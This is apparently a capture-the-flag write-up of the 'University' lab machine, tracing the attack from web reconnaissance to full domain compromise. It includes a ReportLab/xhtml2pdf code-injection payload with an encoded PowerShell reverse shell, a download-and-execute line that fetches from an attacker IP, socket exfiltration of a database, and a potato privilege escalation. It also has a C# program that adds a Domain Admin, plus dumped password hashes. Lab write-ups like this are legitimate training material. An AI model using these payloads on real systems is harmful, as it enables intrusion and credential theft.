University

Recon

nmap_scan.log|h-50%_styled

DNS

└─$ dig any university.htb @10.129.171.109

; <<>> DiG 9.19.21-1-Debian <<>> any university.htb @10.129.171.109
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6205
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 4

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;university.htb.                        IN      ANY

;; ANSWER SECTION:
university.htb.         600     IN      A       10.129.171.109
university.htb.         600     IN      A       192.168.99.1
university.htb.         3600    IN      NS      dc.university.htb.
university.htb.         3600    IN      SOA     dc.university.htb. hostmaster.university.htb. 686 900 600 86400 3600
university.htb.         600     IN      AAAA    dead:beef::8733:c754:fc89:66fc

;; ADDITIONAL SECTION:
dc.university.htb.      3600    IN      A       192.168.99.1
dc.university.htb.      3600    IN      A       10.129.171.109
dc.university.htb.      3600    IN      AAAA    dead:beef::8733:c754:fc89:66fc

;; Query time: 67 msec
;; SERVER: 10.129.171.109#53(10.129.171.109) (TCP)
;; WHEN: Sat Oct 26 15:02:40 EDT 2024
;; MSG SIZE  rcvd: 227

HTTP (80)

Writeup.png

XSS (?)

We are able to submit Contact form and team will probably review it. Potential XSS?

Writeup-1.png

Student

We are able to register as a Student or Professor. First I tried registering as Student.

Creds: test02:test02@university.htb:Password123$

We have option to sign in with normal credentials or certificate.

Writeup-2.png

With normal (successful) login we end up on profile page:

Writeup-3.png

We are able to request a signed certificate:

Writeup-4.png

I wasn't able to generate valid certificate, so I just skipped to Professor role:

Writeup-5.png

Creds: ptest02:ptest02@university.htb:Password123$

We are not able to authenticate as Professor, but we are able to use certificate to login.

Certificates

Let's try forging certificate from Student account.

Generate valid certificate:

└─$ openssl req -newkey rsa:2048 -keyout PK.key -out My-CSR.csr -passout pass:'Password123$' -subj "/CN=test02/emailAddress=test02@university.htb" -quiet

Get signed certificate:

└─$ openssl x509 -in signed-cert.pem -noout -text
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            6a:6b:3b:65:3f:ba:7d:80:be:10:8f:98:24:fa:1f:2e:bf:50:23:45
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=UK, ST=Some-State, O=University Ltd, CN=university.htb, emailAddress=headadmin@university.htb
        Validity
            Not Before: Oct 27 02:43:57 2024 GMT
            Not After : Nov 26 02:43:57 2024 GMT
        Subject: CN=test02, emailAddress=test02@university.htb
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:be:ab:bf:30:e8:ae:f6:28:c7:58:2a:ab:fa:72:
                    ...
                    63:21
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        5c:45:88:99:60:bc:e2:19:a7:f1:37:c9:1b:ac:95:52:51:26:
        ...
        7b:e6:9e:b6

On Courses we can see other user profiles, fuzz:

└─$ curl http://university.htb/accounts/profile/visit/[0-10]/ -s | grep '<input' | awk -F '"' '{print($4, $6)}'
username george
email george@university.htb
first_name george
last_name lantern
address Canada West - Vancouver
username carol
email carol@science.com
first_name Carol
last_name Helgen
address USA - Washington
username Nour
email nour.qasso@gmail.com
first_name Nour
last_name Qasso
address Germany - Frankfurt
username martin.rose
email martin.rose@hotmail.com
first_name Martin
last_name Rose
address US West - Los Angeles
username nya
email nya.laracrof@skype.com
first_name Nya
last_name Laracrof
address UK - London
username Steven.U
email steven@yahoo.com
first_name Steven
last_name Universe
address Italy - Milan
username test02
email test02@university.htb
first_name 30
last_name 30
address 50
username ptest02
email ptest02@university.htb
first_name 30
last_name 30
address 50

george@university.htb is most likely the only real user from this machine.

Playing with certificates yielded no success..

Fuzzing

The application is built very incrementally, like users are queries from URL which is potential IDOR vulnerability, but it easily becomes a pattern.

Writeup-6.png

└─$ curl http://university.htb/static/assets/uploads -Is | head -1
HTTP/1.1 301 Moved Permanently

└─$ curl http://university.htb/static/assets/uploads/ -Is | head -1
HTTP/1.1 403 Forbidden

└─$ curl http://university.htb/static/assets/uploads/x -Is | head -1
HTTP/1.1 404 Not Found

└─$ curl http://university.htb/static/assets/uploads/x/ -Is | head -1
HTTP/1.1 404 Not Found

└─$ curl http://university.htb/static/assets/uploads/csr/ -Is | head -1
HTTP/1.1 404 Not Found

└─$ curl http://university.htb/static/assets/uploads/csrs/ -Is | head -1
HTTP/1.1 403 Forbidden

└─$ curl http://university.htb/static/assets/uploads/pem/ -Is | head -1
HTTP/1.1 404 Not Found

└─$ curl http://university.htb/static/assets/uploads/pems/ -Is | head -1
HTTP/1.1 404 Not Found

/static/assets/uploads/csrs/ is "Forbidden", not "Not Found" meaning it exists.

└─$ curl http://university.htb/static/assets/uploads/csrs/[0-10].csr -sO
└─$ file *.csr
0.csr:      HTML document, ASCII text, with CRLF line terminators
1.csr:      HTML document, ASCII text, with CRLF line terminators
2.csr:      HTML document, ASCII text, with CRLF line terminators
3.csr:      HTML document, ASCII text, with CRLF line terminators
4.csr:      HTML document, ASCII text, with CRLF line terminators
5.csr:      PEM certificate request
6.csr:      HTML document, ASCII text, with CRLF line terminators
7.csr:      PEM certificate request
8.csr:      HTML document, ASCII text, with CRLF line terminators
9.csr:      PEM certificate request
10.csr:     HTML document, ASCII text, with CRLF line terminators
My-CSR.csr: PEM certificate request

└─$ openssl req -in 5.csr -noout -text | grep Subject
        Subject: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd, CN=martin.rose, emailAddress=martin.rose@hotmail.com
        Subject Public Key Info:

└─$ openssl req -in 7.csr -noout -text | grep Subject
        Subject: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd, CN=Steven.U, emailAddress=steven@yahoo.com
        Subject Public Key Info:

└─$ openssl req -in 9.csr -noout -text | grep Subject
        Subject: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd
        Subject Public Key Info:

Certificates are not working, 9th certificate turned out to be professor account which isn't activated, 7th is student account and 5th is professor which we can't auth as.

csrs was a lucky predicted guess, it exists in this wordlists:

└─$ grep '^csrs$' /usr/share/seclists/Discovery -Rain
/usr/share/seclists/Discovery/DNS/namelist.txt:30913:csrs
/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt:442476:csrs
/usr/share/seclists/Discovery/DNS/n0kovo_subdomains.txt:90912:csrs
/usr/share/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt:19918:csrs
/usr/share/seclists/Discovery/Mainframe/default_cics_transactions.txt:177:CSRS

Fuzz some more:

└─$ feroxbuster -u 'http://university.htb/static/assets/uploads/' -w /usr/share/seclists/Discovery/DNS/n0kovo_subdomains.txt
...
301      GET        7l       11w      169c http://university.htb/static/assets/uploads/signatures => http://university.htb/static/assets/uploads/signatures/
301      GET        7l       11w      169c http://university.htb/static/assets/uploads/csrs => http://university.htb/static/assets/uploads/csrs/
301      GET        7l       11w      169c http://university.htb/static/assets/uploads/lectures => http://university.htb/static/assets/uploads/lectures/
...

Do the same with csrs:

└─$ curl http://university.htb/static/assets/uploads/signatures/[1-10].csr -sO; file * | grep HTML | awk -F ':' '{print($1)}' | xargs rm; for file in $(/bin/ls *.csr); do openssl req -in $file -noout -text  | grep 'Subject:'; done;

No luck, even with different extensions.

PDF

At this point nothing related to certificates is working...

https://media1.tenor.com/m/RytdQ4rnlkUAAAAC/spongebob-squarepants-spongebob.gif

Going back to /accounts/profile/ we are able to edit our profile. PHP revshell is not possible, because server is Python.

I tried enumerating other directories and got a hit:

└─$ feroxbuster -u 'http://university.htb/accounts/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -C 502
...
301      GET        0l        0w        0c http://university.htb/accounts/login => http://university.htb/accounts/login/
301      GET        0l        0w        0c http://university.htb/accounts/logout => http://university.htb/accounts/logout/
301      GET        0l        0w        0c http://university.htb/accounts/profile => http://university.htb/accounts/profile/
301      GET        0l        0w        0c http://university.htb/accounts/profile/pdf => http://university.htb/accounts/profile/pdf/

http://university.htb/accounts/profile/pdf/ gives a PDF of our profile:

Writeup-7.png

Producer is xhtml2pdf. It's most probably vulnerable to CVE-2024-25885: An issue in the getcolor function in utils.py of xhtml2pdf v0.2.13 allows attackers to cause a Regular expression Denial of Service (ReDOS) via supplying a crafted string.

PoC: salvatore-abello/CVE-2024-25885.md

Hmm.... the exploit DoS attack which is useless right now. Previously (on SolarLab) we encountered CVE-2023-33733 exploit which has very similar payload and is also using same module.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

Something happened, but no callback

Writeup-8.png

Testing something simple like certutil should be enough for PoC:

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('certutil.exe -urlcache -f http://10.10.14.9') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

Writeup-9.png

PoC worked, but we are not able to catch shell.

Create reverse shell:

└─$ powercat -c 10.10.14.9 -p 4444 -e powershell -g > rev.ps1
└─$ serve

New payload:

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -c IEX ( IWR -UseBasicParsing http://10.10.14.9/rev.ps1 )') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

wao (Reverse Shell)

└─$ listen
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.231.185:54658.
PS C:\Web\University> whoami /all

User Name      SID
============== =============================================
university\wao S-1-5-21-2056245889-740706773-2266349663-1106

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                         Well-known group S-1-5-3                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
UNIVERSITY\Web Developers                  Group            S-1-5-21-2056245889-740706773-2266349663-1129 Mandatory group, Enabled by default, Enabled group
Service asserted identity                  Well-known group S-1-18-2                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

There's database file in app directory, download it:

└─$ listen > db.sqlite3
---
PS C:\Web\University> python -c "import socket; s = socket.socket(); s.connect(('10.10.14.9', 4444)); s.sendall(open('db.sqlite3', 'rb').read()); s.close()"

Current user (wao) doesn't exist in this database, probably not interesting (also it's PBKDF2).

└─$ sqlite3 db.sqlite3 'SELECT username, password FROM University_customuser'
george|pbkdf2_sha256$600000$igb7CzR3ivxQT4urvx0lWw$dAfkiIa438POS8K8s2dRNLy2BKZv7jxDnVuXqbZ61+s=
carol|pbkdf2_sha256$600000$i8XRGybY2ASqA3kEuTW4XH$SwK7A52nA1KOnuniKifqWzrjiIyOnrZu7sf+Zvq44qc=
Nour|pbkdf2_sha256$600000$Bg8pRHaZsbGpLwirrZPvvn$7CtXYJhBDrGhiCvjma7X/AOKRWZS2SP0H6PAXvT96Vw=
martin.rose|pbkdf2_sha256$600000$VzP8VVjEQgQw6HvYAftmCl$s9k3UC/e2++hhQDF2KzhunOaAqxbi4rugRb42dC6qr0=
nya|pbkdf2_sha256$600000$1s48WhgRDulQ6FsNgnXjot$SZ4piS9Ryf4mgIj0prEjN+F0pGEDtNti3b9WaQfAeTk=
Steven.U|pbkdf2_sha256$600000$70XtdR4HrHHignt7EHiOpT$RP9/4PKHmbtCBq0FOPqyppQKjXntM89vc7jGyjk/zAk=
test02|pbkdf2_sha256$600000$qamNz1tpqEzzjKQwmEZJdB$rho+oKxpzn08M4aFZNlhzBXJicIqlfFokKmKJi8+8YQ=

There's backup cronjob which has a password:

PS C:\Web> cat 'C:\Web\DB Backups\db-backup-automator.ps1'
$sourcePath = "C:\Web\University\db.sqlite3"
$destinationPath = "C:\Web\DB Backups\"
$7zExePath = "C:\Program Files\7-Zip\7z.exe"

$zipFileName = "DB-Backup-$(Get-Date -Format 'yyyy-MM-dd').zip"
$zipFilePath = Join-Path -Path $destinationPath -ChildPath $zipFileName
$7zCommand = "& `"$7zExePath`" a `"$zipFilePath`" `"$sourcePath`" -p'WebAO1337'"
Invoke-Expression -Command $7zCommand

wao (WinRM) (DC)

Creds: wao:WebAO1337

└─$ evil-winrm -i 10.129.231.185 -u 'wao' -p 'WebAO1337'
*Evil-WinRM* PS C:\Users\WAO\Documents>
*Evil-WinRM* PS C:\Users\WAO> tree /f /a
Folder PATH listing
Volume serial number is 8E7E-469B
C:.
+---3D Objects
+---Contacts
+---Desktop
+---Documents
+---Downloads
+---Favorites
+---gnupghome
|   \---.config
|       \---python-gnupg
+---Links
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos

Enumerate with WinPeas:

*Evil-WinRM* PS C:\Users\WAO\Music> IWR 10.10.14.9/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\WAO\Music> .\wp.exe | tee -filepath wp.log
...
ÉÍÍÍÍÍÍÍÍÍ͹ Checking write permissions in PATH folders (DLL Hijacking)
È Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
    C:\Program Files\Python310\Scripts\
    C:\Program Files\Python310\
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\
    C:\Windows\System32\OpenSSH\
    (DLL Hijacking) C:\Program Files (x86)\gnupg\bin: WAO [AllAccess]
...
ÉÍÍÍÍÍÍÍÍÍ͹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
    (UNIVERSITY\Administrator) DB Backup: powershell -ExecutionPolicy ByPass -File "C:\Web\DB Backups\db-backup-automator.ps1"
    Permissions file: Web Developers [AllAccess]
    Permissions folder(DLL Hijacking): Web Developers [AllAccess]
    Trigger: At 5:19 PM on day 25 of every month, starting 1/16/2023
...

Nothing too flashy...

└─$ cicada-mastertul -d university.htb -u wao -p WebAO1337 -t 10.129.231.185 --full
----------------------------------------------------
Target IP: 10.129.231.185
Domain: university.htb
Username: wao
Password: WebAO1337
Full Mode Enabled
----------------------------------------------------
--------------------HAPPY HAUNTING!!----------------
---------------------------------------------------------------------------------------
[!x!] Scanning 10.129.231.185
[!] Enumerating SMB...
[-] Could not connect to SMB
[!] Connecting to WinRM...
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Univercity/cicada/mastertul/10.129.231.185/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Univercity/cicada/mastertul/10.129.231.185/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Univercity/cicada/mastertul/10.129.231.185/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/woyag/Desktop/Rooms/Univercity/cicada/mastertul/10.129.231.185/ldap_results
 [!x!] Cleaning up...

Writeup-10.png

Looks like we need to setup tunneling to access internal network hosts.

└─$ chisel server -p 36000 --reverse
---
*Evil-WinRM* PS C:\Users\WAO\Music> IWR 10.10.14.9/chisel -out chisel.exe
*Evil-WinRM* PS C:\Users\WAO\Music> Start-Job -ScriptBlock { & "C:\Users\WAO\Music\chisel.exe" client 10.10.14.9:36000 R:socks; }

Get the IP addresses via arp

*Evil-WinRM* PS C:\Users\WAO\Music> arp -a | sls 192.168.99

Interface: 192.168.99.1 --- 0x6
  192.168.99.2          00-15-5d-05-80-00     dynamic
  192.168.99.12         00-15-5d-05-80-07     dynamic
  192.168.99.255        ff-ff-ff-ff-ff-ff     static

or because hostnames are known:

*Evil-WinRM* PS C:\Users\WAO\Music> @("GMSA01","prometheus","WS-3","DC","LAB-2") | % { nslookup "$_.university.htb" 2>$null }
Server:  localhost
Address:  127.0.0.1

Server:  localhost
Address:  127.0.0.1

Server:  localhost
Address:  127.0.0.1

Name:    WS-3.university.htb
Address:  192.168.99.2

Server:  localhost
Address:  127.0.0.1

Name:    DC.university.htb
Addresses:  dead:beef::ffe5:eeee:5135:35c6
          10.129.178.224
          192.168.99.1
          
Name:    LAB-2.university.htb
Address:  192.168.99.12

wao (WinRM) (WS-3)

└─$ proxychains -q evil-winrm -u 'wao' -p 'WebAO1337' -i 192.168.99.2
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\wao\Documents> hostname
WS-3
*Evil-WinRM* PS C:\Users\wao\Documents> tree /f /a ..
Folder PATH listing
Volume serial number is DA09-D830
C:\USERS\WAO
+---3D Objects
+---Contacts
+---Desktop
|       README.txt
|
+---Documents
+---Downloads
+---Favorites
|   |   Bing.url
|   |
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
*Evil-WinRM* PS C:\Users\wao\Documents> cat ../Desktop/README.txt
Hello Professors.
We have created this note for all the users on the domain computers: WS-1, WS-2 and WS-3.
These computers have not been updated since 10/29/2023.
Since these devices are used for content evaluation purposes, they should always have the latest security updates.
So please be sure to complete your current assessments and move on to the computers "WS-4" and "WS-5".
The security team will begin working on the updates and applying new security policies early next month.
Best regards.
Help Desk team - Rose Lanosta.

*Evil-WinRM* PS C:\Users\wao\Documents>upload www/wp.exe
...
ÉÍÍÍÍÍÍÍÍÍ͹ AV Information
  [X] Exception: Invalid namespace
    No AV was detected!!
    whitelistpaths:     C:\windows\temp
...
ÉÍÍÍÍÍÍÍÍÍ͹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy:
    FilterAdministratorToken:
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.

wao (WinRM) (DC) (Probably unintended)

RunasCs gives us elevated privileges. I thought we would get elevated user, always check privs I guess!

*Evil-WinRM* PS C:\Users\WAO\Music> .\rc.exe wao WebAO1337 'whoami' -b -l 5

university\wao
*Evil-WinRM* PS C:\Users\WAO\Music> .\rc.exe wao WebAO1337 'whoami /priv' -b -l 5

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Note: Above was ran in DC machine

Potato family can help with elevating the user, somewhat same steps like on Ghost machine.

└─$ curl -LOs https://github.com/zcgonvh/EfsPotato/raw/master/EfsPotato.cs
---
*Evil-WinRM* PS C:\Users\WAO\Music> iwr 10.10.14.9/EfsPotato.cs -outfile ep.cs
*Evil-WinRM* PS C:\Users\WAO\Music> ls C:\Windows\Microsoft.Net\Framework -rec -fil csc.exe

    Directory: C:\Windows\Microsoft.Net\Framework\v4.0.30319

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/15/2018  12:10 AM        2170960 csc.exe

*Evil-WinRM* PS C:\Users\WAO\Music> C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe .\ep.cs -nowarn:1691,618
*Evil-WinRM* PS C:\Users\WAO\Music> .\rc.exe wao WebAO1337 'C:\Users\WAO\Music\ep.exe whoami' -b -l 5

Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: UNIVERSITY\WAO
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=aa66d0)
[+] Get Token: 916
[!] process with pid: 1324 created.
==============================
nt authority\system

Instead of reverse shell I decided to just add new user with admin privs.

letmein.cs

using System;
using System.Diagnostics;

class Program {
  static void Main() {
    const string username = "uwu";
    const string password = "Password123$";

    string[] commands = {
      "net user " + username + " " + password + " /add",
      "net localgroup Administrators " + username + " /add",
      "net group 'Domain Admins' " + username + " /add /domain"
    };

    foreach(var cmd in commands) {
      ExecuteCommand(cmd);
    }
  }

  static void ExecuteCommand(string command) {
    ProcessStartInfo processStartInfo = new ProcessStartInfo {
      FileName = "cmd.exe",
        Arguments = "/C " + command,
        RedirectStandardOutput = true,
        RedirectStandardError = true,
        UseShellExecute = false,
        CreateNoWindow = true
    };

    using(Process process = new Process { StartInfo = processStartInfo }) {
      process.Start();

      string output = process.StandardOutput.ReadToEnd();
      string error = process.StandardError.ReadToEnd();

      process.WaitForExit();

      Console.WriteLine("Executed command: " + command);
      if (!string.IsNullOrEmpty(output)) { Console.WriteLine("Output: " +output); }
      if (!string.IsNullOrEmpty(error))  { Console.WriteLine("Error: " + error);   }
    }
  }
}

*Evil-WinRM* PS C:\Users\WAO\Music> upload www/letmein.cs
*Evil-WinRM* PS C:\Users\WAO\MusC:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe letmein.cs
*Evil-WinRM* PS C:\Users\WAO\Music> .\rc.exe wao WebAO1337 'C:\Users\WAO\Music\ep.exe C:\Users\WAO\Music\letmein.exe' -b -l 5

Flags

└─$ evil-winrm -i 10.129.178.224 -u 'uwu' -p 'Password123$'
*Evil-WinRM* PS C:\Users> ls -rec -filter *.txt

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/27/2024   6:22 AM             34 root.txt

    Directory: C:\Users\John.D\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/27/2024   6:22 AM             34 user.txt


*Evil-WinRM* PS C:\Users> ls -rec -filter *.txt | cat
db23d74317e4c83f8998347c80f19b20
9dbf5219dc6af83f8847e9f41f886be8

Secretsdump

└─$ impacket-secretsdump 'UNIVERSITY.HTB/uwu:Password123$@10.129.178.224'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7704a47762a8cd07d2922fc3e97e02a4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e1ab6bc4d7d84111fe3e0fb271de1e0b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesnt have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
UNIVERSITY\DC$:aes256-cts-hmac-sha1-96:1e28d41c5f05d6d11bb85093b1dd37796d526e747f51aa75ab4cad3f3c90bfe7
UNIVERSITY\DC$:aes128-cts-hmac-sha1-96:dd4911edcf56d2626325632928d0f45c
UNIVERSITY\DC$:des-cbc-md5:23944961610b10d0
UNIVERSITY\DC$:plain_password_hex:e97478a1793c33f8f9a11b182653d4c9e62c86d8b6e0a3d73196a9470144a56d3e5c1e9db75e8cc6b580e95a6a5094ef929ea1ede9ac3c890d2103cc2babc001c6bc6d1f501bf69f293b2edd261e6d2a78f7f548efb1bdaf579ff29aada34007b64f40324cedbe67ad19e78760883f63198000caff9ad2f4606b7ebdd8aa2c6c3d573fc3dec04ad378f3e9c00e0017b907bc227daa76db77910961120fc47e8fe605532a350a3096442e2efd4a6227f049c221f8e4a0b27d5bade63d7605438fd088e788815524c8484d2ec7fc11c2ea0a98ca014f819afee1a3da79cd9ea29662456e1006e9460201a6757f46759d18
UNIVERSITY\DC$:aad3b435b51404eeaad3b435b51404ee:2522eb84c83b5e9ffde18045be5b9e59:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x44e8899b6f107411270e6b698b1cfde82435f5c4
dpapi_userkey:0x0616b9ece51544c0f81f1c19a4cb7812aee0feb6
[*] NL$KM 
NL$KM:88460a2baa9113806d4aadd2f2509c467d95dc66c93c552f9218486cdb31be0767230625473640fc4e03ece7cbc428f800674508b93129e4e69f6d5b07f79609
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e63413bab01a0b8820983496c0be3a9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c4599e48661690fa6538fe96d366de:::
university.htb\John.D:1103:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
university.htb\George.A:1104:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
WAO:1106:aad3b435b51404eeaad3b435b51404ee:da49675b9d3d5e403fa3c1c6b5c3f5a2:::
university.htb\hana:1107:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
